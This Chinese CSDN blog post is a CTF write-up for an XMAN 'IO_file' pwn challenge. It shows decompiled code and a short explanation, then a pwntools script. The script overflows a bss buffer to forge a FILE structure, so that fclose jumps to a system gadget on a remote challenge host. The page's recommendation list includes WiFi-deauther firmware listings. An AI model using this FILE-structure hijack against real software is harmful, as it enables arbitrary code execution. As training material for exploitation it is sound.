pwn-chanllege1-IO_file-XMAN

最新推荐文章于 2023-05-26 17:53:35 发布
最新推荐文章于 2023-05-26 17:53:35 发布
阅读量373 收藏
点赞数
分类专栏: pwn 文章标签: first
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w12315q/article/details/81668635
版权

##xman-个人排位赛

###pwn-chanllege1-IO_file

链接:https://pan.baidu.com/s/1vSrgF4iQ-2X6gQSciEPi9Q 密码:g2hc
#####这是一道简单的io_file的题,通过这个题大概可以知道io_file的机制,总的来说其实就是控制fd指针导致最后指针指向我们需要控制的函数
######先拖入ida:
    __int64 __fastcall main(__int64 a1, char **a2, char **a3)
       {
        int v4; // [rsp+Ch] [rbp-4h]

        stream = fopen("test.txt", "r");
        sub_400950("test.txt", "r");
        while ( 1 )
      {
         while ( 1 )
      {
      putchar(62);
      v4 = sub_4008AF(62LL);
      if ( v4 != 1 )
        break;
      sub_400908();
       }
      if ( v4 != 2 )
         break;
      sub_400920();
       }
        if ( v4 == 3 )
        sub_400933();
         return 0LL;
     }
######这是大概的代码:
      函数sub_4008AF:是用来进行输入的一个函数,输入大概有3种  
      1,2,3
      函数sub_400908:是用来get,s这个变量的函数,这个变量很关
      键因为他在bss段上且在fd指针之上
      函数sub_400920:是用来puts,s这个变量的函数,这个并不是很 
      关键的函数
      函数sub_400933:是一个fclose的一个函数,是一个我们可以发
      现漏洞的地方
      这就是大概函数的意思!!
######从这个函数的引发出了解题思路:
      首先s可以溢出,溢出之后覆盖了fd指针然后再运行fclose进行对
      fd指针的调用然后构造system函数
######代码:
     #!/usr/bin/env python
     # -*- coding: utf-8 -*-
     from pwn import *

    binary = './task_challenge1'
    elf = ELF(binary)
    libc = elf.libc
    #io = process(binary)
    io = remote('202.112.51.184',30003)
    context.log_level = 'debug'
    context.arch = elf.arch
    #context.terminal = ['tmux', 'splitw', '-h']
    
    myu64 = lambda x: u64(x.ljust(8, '\0'))
    ub_offset = 0x3c4b30
    io.recvuntil('>')
    io.sendline('1')
    #gdb.attach(io, 'b _IO_new_fclose')
    buf_addr = 0x6010C0
    system = 0x400897
    pay = ((('\0'*0x10+p64(system)+'\0'*70).ljust(0x88,'\0') +\
      p64(buf_addr)).ljust(0xd8,'\0')+\
      p64(buf_addr)).ljust(0x100,'\0')+\
      p64(buf_addr)
      io.sendline(pay)
      io.recvuntil('>')
    io.sendline('3')

  io.interactive()

Peanuts_CTF
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5105
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
PWNIO_FILE的利用
u014377094的博客
05-05 1249
IO_FILE 的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read
ctf-pwn-堆—IO_FILE
xy_369的博客
05-26 318
ctf-pwn-堆—文件IO 教程
PWN技巧之_IO_FILE文件结构体利用echo_from_your_heart
aptx4869_li的博客
02-15 708
PWN之_IO_FILE文件结构体利用echo from your heart
浅析IOFILE结构及利用
Peanuts
11-21 3293
浅析IOFILE结构及利用 本文首发于先知社区 在hctf中遇到了这么一个题,也借这个题专门去补了补自己在IOFILE这一块知识点的知识。 libio.h中的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
攻防世界(pwn)echo_back + magic (_IO_FILE文件流攻击初探)
PLpa的博客
03-14 1331
前言: 这两题都是关于_IO_FILE文件流攻击的题目,如果对_IO_FILE文件流不是很清楚,可以看ctfwiki中的_IO_FILE介绍——传送门。 echo_back——关于_IO_2_1_stdin结构的利用 文件保护全开,不能got覆写。 进入IDA,发现程序有两个功能,一个是setname,一个是echo back。 查看setname功能,发现此功能只能输入7个字节,不具备RO...
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1028
PWN技巧之_IO_FILE结构体利用house of orange
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1515
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
hctf[pwn] the-end
九层台
11-12 1979
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf("here is a gift %p, good luck ;)\n", &a...
file struct 利用总结——百度杯总决赛线上赛try to pwn write up
jmp esp
04-08 2134
简介file stream overflow是pwn的一种常用方法(至少最近几次比赛变得有点常用了),主要是通过利用libc的FILE结构体中的一些特点达到控制流劫持的效果。一般来说劫持控制流的方式主要是: 1. 更改栈上返回地址,这种方法在堆相关的利用和格式化字符串利用时需要知道栈地址,或者有栈溢出等方法,才能够更改到栈地址 2. 更改got表地址,这种方法在开启了full relro的时候就
pwnable.kr---leg
leeham的博客
10-30 1070
pwnable.kr—leg解题思路这是一道和asm有关的题,题目提供了源代码、.asm文件、flag文件以及leg的可执行文件。虽然leg.c代码比较长,但是关键点只有四处,掌握好四处关键点,就可以迎刃而解了。
CTF 用户态ptmalloc pwn总结(一)
weixin_41918450的博客
09-24 886
kernel pwn题不准备以总结的方式来写,准备每一道题一篇文章专门分析,有很多题网上都有不少解析,我只在github提供的脚本基础上进行复现和分析(因为能力不够,比赛时kernel pwn做不出,只能赛后复现了) 准备讲一下这三道题,关于强网杯的两道题其实是csaw2010的两道题进行了一些修改。最后会写一篇文章进行专门的总结,关于在这三道题复现过程中的问题以及一些利用技巧。 强网杯2018 ...
Seccon2017-pwn500-video_player
weixin_30448685的博客
12-11 106
感觉这个题目并不值500分,有些地方比较牵强,漏洞也比较明显,解题方法有多种,出题者把堆的布局随机化了,不过使用fastbin doublefree的话,可以完全忽视被打乱的堆。 1 from pwn import * 2 #context.log_level='debug' 3 #wah 4 def newaudioclip(r, bitrate, length,...
PWNctf的pwn题解析
Peanuts
11-08 8590
  importantservice 这个题目比较简单,保护开的很多多到我怀疑自己是不是把题目想的太简单了,结果果然是这么简单的。。 程序功能分析 main函数分析 main函数的功能并不复杂,开头一个dologic函数对v5这个指针进行一个赋值,然后接着让你输入两个数字,是身高和体重,会有一个check乘积不能大(可能怕你太不匀称
攻防世界pwn-forgot
最新发布
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值